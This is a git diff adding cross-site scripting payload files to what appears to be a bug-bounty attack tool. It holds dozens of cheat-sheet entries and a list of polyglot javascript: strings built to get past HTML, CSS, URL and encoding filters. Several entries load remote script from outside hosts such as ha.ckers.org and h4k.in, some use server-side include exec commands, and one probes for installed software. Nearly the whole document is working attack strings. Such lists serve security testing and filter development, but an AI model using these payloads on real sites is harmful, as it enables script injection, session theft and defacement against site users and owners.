OWASP + +Obfuscated image tag using long dec entities +Exploit Name: Obfuscated image tag using long dec entities +Exploit String: <IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058 +&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041> +Exploit Description: This attack is built together with obfuscated long decimal entities and create a JS image source. +Exploit Tags: general, owasp, obfuscated, evil tags, internet explorer +Author Name: OWASP + +Obfuscated JS image source +Exploit Name: Obfuscated JS image source +Exploit String: >"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a; +alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)> +Exploit Description: This vector uses urlencoded hex entities to obfuscate the javascript: image source. +Exploit Tags: general, owasp, obfuscated, evil tags, internet explorer +Author Name: OWASP + +Obfuscated name trigger for Firefox +Exploit Name: Obfuscated name trigger for Firefox +Exploit String: (1?(1?{a:1?""[1?"ev\a\l":0](1?"\a\lert":0):0}:0).a:0)[1?"\c\a\l\l":0](content,1?"x\s\s":0) +Exploit Description: This XSS vector uses a parser bug in Firefox to obfuscate the methods needed to trigger the name contained payload. +Exploit Tags: general, gecko, obfuscated, self contained +Author Name: SIrDarckCat + +Obfuscated onload attribute variant 1 +Exploit Name: Obfuscated onload attribute variant 1 +Exploit String: <body/s/onload=x={doc:parent.document};x.doc.writeln(1) +Exploit Description: This vector creates a new body tag including an obfuscated onload attribute. Also the document object is wrapped into a JSON literal to evade filters. +Exploit Tags: general, obfuscated, evil tags, JSON +Author Name: thespanner.co.uk + +Obfuscated onload attribute variant 2 +Exploit Name: Obfuscated onload attribute variant 2 +Exploit String: <body/””$/onload=x={doc:parent[’document’]};x.doc.writeln(1) +Exploit Description: This vector creates a new body tag including an obfuscated onload attribute. Also the document object is wrapped into a JSON literal to evade filters. +Exploit Tags: general, obfuscated, evil tags, JSON +Author Name: thespanner.co.uk + +Obfuscated XML predicate vector variation 1 +Exploit Name: Obfuscated XML predicate vector variation 1 +Exploit String: 123[''+<_>ev</_>+<_>al</_>](''+<_>aler</_>+<_>t</_>+<_>(1)</_>); +Exploit Description: This vector uses XML predicates to obfuscate its payload and the fact that you can use underscores as XML tags. +Exploit Tags: general, xml predicates, obfuscated, gecko +Author Name: PHPIDS Group + +Obfuscated XML predicate vector variation 2 +Exploit Name: Obfuscated XML predicate vector variation 2 +Exploit String: s1=<s>evalalerta(1)a</s>,s2=<s></s>+'',s3=s1+s2,e1=/s/!=/s/?s3[0]: +0,e2=/s/!=/s/?s3[1]:0,e3=/s/!=/s/?s3[2]:0,e4=/s/!=/s/?s3[3]:0,e=/s/!=/ +s/?0[e1+e2+e3+e4]:0,a1=/s/!=/s/?s3[4]:0,a2=/s/!=/s/?s3[5]:0,a3=/s/!=/ +s/?s3[6]:0,a4=/s/!=/s/?s3[7]:0,a5=/s/!=/s/?s3[8]:0,a6=/s/!=/s/?s3[10]: +0,a7=/s/!=/s/?s3[11]:0,a8=/s/!=/s/?s3[12]: +0,a=a1+a2+a3+a4+a5+a6+a7+a8,1,e(a) +Exploit Description: This vector uses XML predicates to obfuscate its payload and the fact that you can use underscores as XML tags. Also a concatenation via ternary operator is being used. +Exploit Tags: general, xml predicates, obfuscated, gecko +Author Name: PHPIDS Group + +Obfuscated XML predicate vector variation 3 +Exploit Name: Obfuscated XML predicate vector variation 3 +Exploit String: o={x:''+<s>eva</s>+<s>l</s>,y:''+<s>aler</s>+<s>t</s>+<s>(1)</ +s>};function f() { 0[this.x](this.y) }f.call(o); +Exploit Description: This vector uses XML predicates to obfuscate its payload. The payload is furthermore wrapped into JSON literals for more obfuscation. +Exploit Tags: general, xml predicates, obfuscated, gecko, JSON +Author Name: .mario + +Obfuscated XSS variant 1 +Exploit Name: Obfuscated XSS variant 1 +Exploit String: ___=1?'ert(123)':0,_=1?'al':0,__=1?'ev':0,1[__+_](_+___) +Exploit Description: Shuffled and obfuscated function calls +Exploit Tags: general, obfuscated +Author Name: PHPIDS Group + +OBJECT +Exploit Name: OBJECT +Exploit String: <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> +Exploit Description: If they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag. The linked file is actually an HTML file that can contain your XSS +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +OBJECT w/Embedded XSS +Exploit Name: OBJECT w/Embedded XSS +Exploit String: <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> +Exploit Description: Using an OBJECT tag you can embed XSS directly (this is unverified). +Exploit Tags: general, evil tags, obfuscated, internet explorer +Author Name: ha.ckers.org + +OBJECT w/Flash 2 +Exploit Name: OBJECT w/Flash 2 +Exploit String: a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")";eval(a+b+c+d); +Exploit Description: Using this action script inside flash can obfuscate your XSS vector. +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Octal Encoding +Exploit Name: Octal Encoding +Exploit String: <A HREF="http://0102.0146.0007.00000223/">XSS</A> +Exploit Description: URL string evasion (assuming ”http://www.google.com/” is programmatically disallowed). +Padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc... +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Open string contained in name property +Exploit Name: Open string contained in name property +Exploit String: open(name) +Exploit Description: This very simple but effective vector uses the open method on the name property. +Exploit Tags: general, super short, self contained +Author Name: SIrDarckCat + +PHP +Exploit Name: PHP +Exploit String: <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> +Exploit Description: PHP - requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues. +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Plain JavaScript alert +Exploit Name: Plain JavaScript alert +Exploit String: alert(1) +Exploit Description: This very basic exploit works on surprisingly many pages - no real danger but bad image. +Exploit Tags: general, basic, super short +Author Name: .mario + +Protocol Resolution Bypass +Exploit Name: Protocol Resolution Bypass +Exploit String: <A HREF="//www.google.com/">XSS</A> +Exploit Description: URL string evasion (assuming ”http://www.google.com/” is programmatically disallowed). +Protocol resolution bypass (// translates to http:// which saves a few more bytes). This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like ”(ht|f)tp(s)?://” (thanks to Ozh (http://planetOzh.com/) for part of this one). You can also change the ”//” to ”\\”. You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL. +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +Protocol resolution in script tags +Exploit Name: Protocol resolution in script tags +Exploit String: <SCRIPT SRC=//ha.ckers.org/.j> +Exploit Description: This particular variant was submitted by Lukasz Pilorz and was based partially off of Ozh's protocol resolution bypass below. This cross site scripting example works in IE, Netscape in IE rendering mode and Opera if you add in a </SCRIPT> tag at the end. However, this is especially useful where space is an issue, and of course, the shorter your domain, the better. The ”.j” is valid, regardless of the MIME type because the browser knows it in context of a SCRIPT tag. +Exploit Tags: general, evil tags, obfuscated, injection +Author Name: ha.ckers.org + +RegExp based, and native C filter vector. +Exploit Name: RegExp based, and native C filter vector. +Exploit String: 0%0d%0a%00<script src=//h4k.in> +Exploit Description: This will break any RegExp that includes "$" (end of string), and some filters that do the verification manually with a for waiting for a NULL byte. +Exploit Tags: general, injection, CRLF, obfuscated +Author Name: SIrDarckCat +Author URL: http://sirdarckcat.net/ + +Remote IE URL overloading +Exploit Name: Remote IE URL overloading +Exploit String: s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1) +'+''; +u1=s1+s2+s3;URL=u1 +Exploit Description: This vector assembles an alert which will be fired using the URL property. +Exploit Tags: general, obfuscated, internet explorer, URL breaking +Author Name: thespanner.co.uk + +Remote Stylesheet 1 +Exploit Name: Remote Stylesheet 1 +Exploit String: <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> +Exploit Description: Remote style sheet (using something as simple as a remote style sheet you can include your XSS as the style question redefined using an embedded expression.) This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: With all of these remote style sheet examples they use the body tag, so it won't work unless there is some content on the page other than the vector itself, so you'll need to add a single letter to the page to make it work if it's an otherwise blank page. +Exploit Tags: general, evil tags, obfuscated, injection +Author Name: ha.ckers.org + +Remote Stylesheet 2 +Exploit Name: Remote Stylesheet 2 +Exploit String: <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> +Exploit Description: Remote style sheet part 2 (this works the same as above, but uses a <STYLE> tag instead of a <LINK> tag). A slight variation on this vector was used to hack Google Desktop http://www.hacker.co.il/security/ie/css_import.html. As a side note you can remote the end STYLE tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equal sign or a slash in your cross site scripting attack, which has come up at least once in the real world. +Exploit Tags: general, evil tags, obfuscated, style injection +Author Name: ha.ckers.org + +Remote Stylesheet 3 +Exploit Name: Remote Stylesheet 3 +Exploit String: <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> +Exploit Description: Remote style sheet part 3. This only works in Opera but is fairly tricky. Setting a link header is not part of the HTTP1.1 spec. However, some browsers still allow it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different than in the HTTP header saying Link: <http://ha.ckers.org/xss.css>; REL=stylesheet) and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in FireFox. +Exploit Tags: general, evil tags, injection +Author Name: ha.ckers.org + +Remote Stylesheet 4 +Exploit Name: Remote Stylesheet 4 +Exploit String: <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> +Exploit Description: Remote style sheet part 4. This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and therefore is vulnerable to this for the vast majority of sites. +Exploit Tags: general, evil tags, obfuscated, style injection, XBL +Author Name: ha.ckers.org + +Removing Cnames +Exploit Name: Removing Cnames +Exploit String: <A HREF="http://google.com/">XSS</A> +Exploit Description: URL string evasion (assuming ”http://www.google.com/” is programmatically disallowed). +When combined with the above URL, removing ”www.” will save an additional 4 bytes for a total byte savings of 9 for servers that have this set up properly. +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +Rename .js to .jpg +Exploit Name: Rename .js to .jpg +Exploit String: <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> +Exploit Description: Assuming you can only fit in a few characters and it filters against ”.js” you can rename your JavaScript file to an image as an XSS vector. +Exploit Tags: general, evil tags, obfuscated, injection +Author Name: ha.ckers.org + +res:// installed software probing +Exploit Name: res:// installed software probing +Exploit String: res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210 +Exploit Description: This res-uri can be used to probe for certain software in IE. +Exploit Tags: URI exploits, injection, general, obfuscated, internet explorer +Author Name: xs-sniper + +SCRIPT w/Alert() +Exploit Name: SCRIPT w/Alert() +Exploit String: <SCRIPT>alert('XSS')</SCRIPT> +Exploit Description: Basic injection attack +Exploit Tags: general, evil tags, basic +Author Name: ha.ckers.org + +SCRIPT w/Char Code +Exploit Name: SCRIPT w/Char Code +Exploit String: <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +Exploit Description: Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word ”XSS” will pop up. +Exploit Tags: general, evil tags, obfuscated, basic +Author Name: ha.ckers.org + +SCRIPT w/Source File +Exploit Name: SCRIPT w/Source File +Exploit String: <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +Exploit Description: No filter evasion. This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here). +Exploit Tags: general, evil tags, basic, injection +Author Name: ha.ckers.org + +Self-contained XSS variant 1 +Exploit Name: Self-contained XSS variant 1 +Exploit String: a=0||'ev'+'al',b=0||location.hash,c=0||'sub'+'str',1[a](b[c](1)) +Exploit Description: Concatenates obfuscated eval() and substr() to be called on location.hash +Exploit Tags: general, self contained +Author Name: PHPIDS Group + +Self-contained XSS variant 2 +Exploit Name: Self-contained XSS variant 2 +Exploit String: a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n.h'+'ash.sub'||0;b+=0||'str(1)';c=b[a];c(c(b)) +Exploit Description: Concatenates fragmented functions to evakuate the location hash +Exploit Tags: general, self contained +Author Name: PHPIDS Group + +Self-contained XSS variant 3 +Exploit Name: Self-contained XSS variant 3 +Exploit String: eval.call(this,unescape.call(this,location)) +Exploit Description: Uses call() and eval() to access the payload in the fragment identifier +Exploit Tags: general, self contained +Author Name: PHPIDS Group + +Self-contained XSS variant 4 +Exploit Name: Self-contained XSS variant 4 +Exploit String: d=0||'une'+'scape'||0;a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n'||0;c=b[a];d=c(d);c(d(c(b))) +Exploit Description: This one is pretty hard to detect due to the total fragmentation. Fragments are built together to a self-executing function. +Exploit Tags: general, self contained +Author Name: PHPIDS Group + +Self-contained XSS variant 5 +Exploit Name: Self-contained XSS variant 5 +Exploit String: l= 0 || 'str',m= 0 || 'sub',x= 0 || 'al',y= 0 || 'ev',g= 0 || 'tion.h',f= 0 || 'ash',k= 0 || 'loca',d= (k) + (g) + (f),a +Exploit Description: This variant has the function fragments shuffled to evade concatenation filters and is thus very hard to detect. +Exploit Tags: general, self contained, shuffled +Author Name: PHPIDS Group + +Self-contained XSS variant 6 +Exploit Name: Self-contained XSS variant 6 +Exploit String: _=eval,__=unescape,___=document.URL,_(__(___)) +Exploit Description: Since Javascript allows \w+ as variable name - this vector uses _ to evade filters. +Exploit Tags: general, self contained +Author Name: PHPIDS Group + +Self-contained XSS variant 7 +Exploit Name: Self-contained XSS variant 7 +Exploit String: $_=document,$__=$_.URL,$___=unescape,$_=$_.body,$_.innerHTML = $___(http=$__) +Exploit Description: Uses special characters as variable names and self-executes the concatenated payload trigger. +Exploit Tags: general, self contained +Author Name: PHPIDS Group + +Self-contained XSS variant 8 +Exploit Name: Self-contained XSS variant 8 +Exploit String: $=document,$=$.URL,$$=unescape,$$$=eval,$$$($$($)) +Exploit Description: This time $ is used to obfuscate the self-executing payload trigger. +Exploit Tags: general, self contained +Author Name: PHPIDS Group + +Self-contained XSS variant 9 +Exploit Name: Self-contained XSS variant 9 +Exploit String: evil=/ev/.source+/al/.source,changeProto=/Strin/.source+/g.prototyp/.source+/e.ss=/.source+/Strin/.source+/g.prototyp/.source+/e.substrin/.source+/g/.source,hshCod=/documen/.source+/t.locatio/.source+/n.has/.source+/h/.source;7[evil](changeProto);hsh=7[evil](hshCod),cod=hsh.ss(1);7[evil](cod) +Exploit Description: This more than sophisticated vector is hard to explain - it' creator did here: http://sla.ckers.org/forum/read.php?2,13209,page=2#msg-13409 +Exploit Tags: general, self contained, shuffled +Author Name: PHPIDS Group + +Self-containing XSS with no dots +Exploit Name: Self-containing XSS with no dots +Exploit String: with(location)with(hash)eval(substring(1)) +Exploit Description: This vector uses with() to activate the payload behind the fragment identifier. No dots are used to enable easier filter evasion. +Exploit Tags: general, super short, self contained +Author Name: ma1 + +Spaces/Meta Chars +Exploit Name: Spaces/Meta Chars +Exploit String: <IMG SRC=" &#14; javascript:alert('XSS');"> +Exploit Description: Spaces and meta chars before the JavaScript in images for XSS (this is useful if the pattern match doesn't take into account spaces in the word ”javascript:” - which is correct since that won't render- and makes the false assumption that you can't have a space between the quote and the ”javascript:” keyword. The actual reality is you can have any char from 1-32 in decimal). +Exploit Tags: general, evil tags, obfuscated, internet explorer +Author Name: ha.ckers.org + +SSI +Exploit Name: SSI +Exploit String: <!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--> +Exploit Description: SSI (Server Side Includes) requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues. +Exploit Tags: general, evil tags, obfuscated, SSI, injection +Author Name: ha.ckers.org + +STYLE +Exploit Name: STYLE +Exploit String: <STYLE TYPE="text/javascript">alert('XSS');</STYLE> +Exploit Description: STYLE tag (Older versions of Netscape only) +Exploit Tags: general, evil tags, style injection, gecko +Author Name: ha.ckers.org + +Style injection via content and double-eval +Exploit Name: Style injection via content and double-eval +Exploit String: <style> +body:after{ +content: “\61\6c\65\72\74\28\31\29″ +} +</style> +<script> +eval(eval(document.styleSheets[0].cssRules[0].style.content)) +</script> +Exploit Description: This vector utilizes the CSS content property and fetches it off the document.styleSheets property afterwards. For correct execution of the payload a double-eval is needed. +Exploit Tags: general, onfuscated, style injection +Author Name: .mario + +STYLE w/Anonymous HTML +Exploit Name: STYLE w/Anonymous HTML +Exploit String: <XSS STYLE="xss:expression(alert('XSS'))"> +Exploit Description: Anonymous HTML with STYLE attribute (IE and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter) +Exploit Tags: general, evil tags, obfuscated, internet explorer +Author Name: ha.ckers.org + +STYLE w/background +Exploit Name: STYLE w/background +Exploit String: <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +Exploit Description: STYLE tag using background. +Exploit Tags: general, evil tags, injection, internet explorer +Author Name: ha.ckers.org + +STYLE w/background-image +Exploit Name: STYLE w/background-image +Exploit String: <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> +Exploit Description: STYLE tag using background-image. +Exploit Tags: general, evil tags, internet explorer, style injection +Author Name: ha.ckers.org + +STYLE w/broken up JavaScript +Exploit Name: STYLE w/broken up JavaScript +Exploit String: <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> +Exploit Description: STYLE tags with broken up JavaScript for XSS (this XSS at times sends IE into an infinite loop of alerts). +Exploit Tags: general, evil tags, style injection, internet explorer +Author Name: ha.ckers.org + +STYLE w/Comment +Exploit Name: STYLE w/Comment +Exploit String: <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> +Exploit Description: STYLE attribute using a comment to break up expression (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one) +Exploit Tags: general, evil tags, style injection, internet explorer +Author Name: ha.ckers.org + +Stylesheet +Exploit Name: Stylesheet +Exploit String: <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> +Exploit Description: Stylesheet +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +Style-breaker using obfuscated JavaScript +Exploit Name: Style-breaker using obfuscated JavaScript +Exploit String: }</style><script>a=eval;b=alert;a(b(/i/.source));</script> +Exploit Description: This vector ends styleblocks and uses obfuscated JavaScript to create an alert. +Exploit Tags: general, html breaking, CSS breaking +Author Name: kishor + +Super basic HTML breaker 2 +Exploit Name: Super basic HTML breaker 2 +Exploit String: >"' +Exploit Description: This super basic vector breaks HTML attributes + +Exploit Tags: general, basic, super short, html breaking +Author Name: .mario + +Super short XSS variant 1 +Exploit Name: Super short XSS variant 1 +Exploit String: a=alert + +a(0) +Exploit Description: This extremely short XSS vector works only when newlines can be injected. +Exploit Tags: general, super short +Author Name: .mario + +Super short XSS variant 2 +Exploit Name: Super short XSS variant 2 +Exploit String: A=alert;A(1) +Exploit Description: This extremely short XSS vector works with out the need for newlines to be injected, +Exploit Tags: super short, general, basic +Author Name: -unknown- + +TABLE +Exploit Name: TABLE +Exploit String: <TABLE BACKGROUND="javascript:alert('XSS')"></TABLE> +Exploit Description: Table background (who would have thought tables were XSS targets... except me, of course). +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +TD +Exploit Name: TD +Exploit String: <TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE> +Exploit Description: TD background. +Exploit Tags: general, evil tags +Author Name: ha.ckers.org + +Textarea-breaker with mouseover +Exploit Name: Textarea-breaker with mouseover +Exploit String: </textarea><br><code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOVE MOUSE OVER THIS AREA</code> +Exploit Description: This vector breaks textareas and creates an element reacting on mouveover events. +Exploit Tags: general, html breaking, obfuscated, user interaction +Author Name: kishor + +Unicode encoded script tags +Exploit Name: Unicode encoded script tags +Exploit String: '%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' +Exploit Description: This vector uses unicode encoded codepoints to create a script tag producing an alert. +Exploit Tags: general, basic, obfuscated, evil tags +Author Name: OWASP + +URL breaker for double quotes +Exploit Name: URL breaker for double quotes +Exploit String: http://aa"><script>alert(123)</script> +Exploit Description: This vector breaks double quoted URL input +Exploit Tags: URL breaking, general, basic, html breaking +Author Name: .mario + +URL breaker for single quotes +Exploit Name: URL breaker for single quotes +Exploit String: http://aa'><script>alert(123)</script> +Exploit Description: This vector breaks single quoted URL input +Exploit Tags: URL breaking, basic, general, html breaking +Author Name: .mario + +URL encoded image source +Exploit Name: URL encoded image source +Exploit String: >%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22> +Exploit Description: This vector utilizes an urlencoded JS image source to create an alert. +Exploit Tags: general, basic, obfuscated, internet explorer +Author Name: OWASP + +URL Encoding +Exploit Name: URL Encoding +Exploit String: <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> +Exploit Description: URL string evasion (assuming ”http://www.google.com/” is programmatically disallowed). +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +URL-breaking vector +Exploit Name: URL-breaking vector +Exploit String: http://aa<script>alert(123)</script> +Exploit Description: This vector is a basic URL breaker - embedding an alert in a URL-like wrapper. +Exploit Tags: general, URL breaking, basic +Author Name: kishor + +US-ASCII encoding +Exploit Name: US-ASCII encoding +Exploit String: %BCscript%BEalert(%A2XSS%A2)%BC/script%BE +Exploit Description: Found by Kurt Huwig http://www.iku-ag.de/ This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the hosts transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding. +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +UTF-7 Encoding +Exploit Name: UTF-7 Encoding +Exploit String: <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +Exploit Description: UTF-7 encoding - if the page that the XSS resides on doesn't provide a page charset header, or any browser that is set to UTF-7 encoding can be exploited with the following (Thanks to Roman Ivanov http://www.pixel-apes.com/ for this one). You don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-types on the page in Internet Explorer and Netscape 8.1 IE rendering engine mode). Watchfire http://seclists.org/lists/fulldisclosure/2005/Dec/1107.html found this hole in Google's custom 404 script. +Exploit Tags: general, evil tags, obfuscated +Author Name: ha.ckers.org + +UTF-8 Unicode Encoding +Exploit Name: UTF-8 Unicode Encoding +Exploit String: <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> +Exploit Description: UTF-8 Unicode encoding (all of the XSS examples that use a javascript: directive inside of an IMG tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode). +Exploit Tags: general, evil tags, obfuscated, internet explorer +Author Name: ha.ckers.org + +with() executing alert via document.__parent__ +Exploit Name: with() executing alert via document.__parent__ +Exploit String: with(document.__parent__)alert(1) +Exploit Description: This vector uses the __parent__ property combined with with() to execute an alert. +Exploit Tags: general, super short, obfuscated, gecko, __property__ +Author Name: .mario + +XML data island w/CDATA +Exploit Name: XML data island w/CDATA +Exploit String: <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML> +Exploit Description: XML data island with CDATA obfuscation (this XSS attack works only in IE and Netscape 8.1 IE rendering engine mode) - vector found by Sec Consult http://www.sec-consult.html while auditing Yahoo. +Exploit Tags: general, evil tags, obfuscated, XML injection +Author Name: ha.ckers.org + +XML data island w/comment +Exploit Name: XML data island w/comment +Exploit String: <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +Exploit Description: XML data island with comment obfuscation (doesn't use CDATA fields, but rather uses comments to break up the javascript directive) +Exploit Tags: general, evil tags, obfuscated, XML injection +Author Name: ha.ckers.org + +XML HTML+TIME +Exploit Name: XML HTML+TIME +Exploit String: <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML> +Exploit Description: HTML+TIME in XML. This is how Grey Magic http://www.greymagic.com/security/advisories/gm005-mc/ hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work. +Exploit Tags: general, evil tags, obfuscated, XML injection +Author Name: ha.ckers.org + +XML namespace +Exploit Name: XML namespace +Exploit String: <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML> +Exploit Description: XML namespace. The .htc file must be located on the server as your XSS vector. +Exploit Tags: general, evil tags, obfuscated, XML injection +Author Name: ha.ckers.org + +XML predicate XSS using content[n] +Exploit Name: XML predicate XSS using content[n] +Exploit String: y=<a>alert</a>;content[y](123) +Exploit Description: This vector uses XML predicate properties to activate its payload. +Exploit Tags: general, XML predicates, gecko +Author Name: PHPIDS Group + +XML (locally hosted) +Exploit Name: XML (locally hosted) +Exploit String: <XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> +Exploit Description: Locally hosted XML with embedded JavaScript that is generated using an XML data island. This is the same as above but instead refers to a locally hosted (must be on the same server) XML file that contains the cross site scripting vector. +Exploit Tags: general, evil tags, obfuscated, XML injection +Author Name: ha.ckers.org + +XSS Quick Test +Exploit Name: XSS Quick Test +Exploit String: '';!--"<XSS>=&{()} +Exploit Description: If you don't have much space, this string is a nice compact XSS injection check. View source after injecting it and look for <XSS versus &lt;XSS to see if it is vulnerable. +Exploit Tags: general, html breaking, JS breaking, comment breaking +Author Name: ha.ckers.org + +XSS via VBScript MsgBox +Exploit Name: XSS via VBScript MsgBox +Exploit String: Execute(MsgBox(chr(88)&chr(83)&chr(83)))< +Exploit Description: This vector creates an alert like message boy via Visual Basic Script +Exploit Tags: general, basic, internet explorer +Author Name: -unknown- + +__parent__ stored JS alert +Exploit Name: __parent__ stored JS alert +Exploit String: document.__parent__._=alert +_(1) +Exploit Description: This vector uses the __parent__ property to store the alert function and execute it afterwards with new label. +Exploit Tags: general, super short, obfuscated, gecko, __property__ +Author Name: .mario + +__proto__ stored JS alert +Exploit Name: __proto__ stored JS alert +Exploit String: top.__proto__._= alert +_(1) +Exploit Description: This vector uses the __proto__ property to store the alert function and execute it afterwards with new label. +Exploit Tags: general, super short, obfuscated, gecko, __property__ +Author Name: .mario + +iframe Chrome bypass +Exploit String: <iframe%20src="javascript:alert(1) +Author Name: thespanner.co.uk + +anchor Chrome bypass +Exploit String: <a%20href="javascript:alert(1); +Author Name: thespanner.co.uk + +wtf? Chrome +Exploit String: <svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/> diff --git a/bounty_drive/attacks/xss/payloads/XSS-innerht-ml.txt b/bounty_drive/attacks/xss/payloads/XSS-innerht-ml.txt new file mode 100644 index 0000000..8a383cf --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/XSS-innerht-ml.txt @@ -0,0 +1,49 @@ +javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//> +javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//> +javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//> +javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>` +javascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">` +javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/<i<frame */ onload=alert()//</script> +javascript:"/*`/*\"/*'/*</stYle/</titLe/</teXtarEa/</nOscript></noembed></template></script/--><ScRipt>/*<i<frame/*/ onload=alert()//</Script> +javascript:`</template>\"///"//</script/--></title/'</style/</textarea/</noembed/</noscript><<script/>/<frame */; onload=alert()//<</script>` +javascript:`</template>\"///"//</script/--></title/'</style/</textarea/</noembed/</noscript><<script/>/<frame */; onload=alert()//<</script>` +javascript:/*`//'//\"//</style></noscript></script>--></textarea></noembed></template></title><script>/<frame <svg"///*/ onload=alert()//</script> +javascript:/*"//'//`//\"//--></script></title></style></textarea></template></noembed></noscript><script>//<frame/<svg/*/onload= alert()//</script> 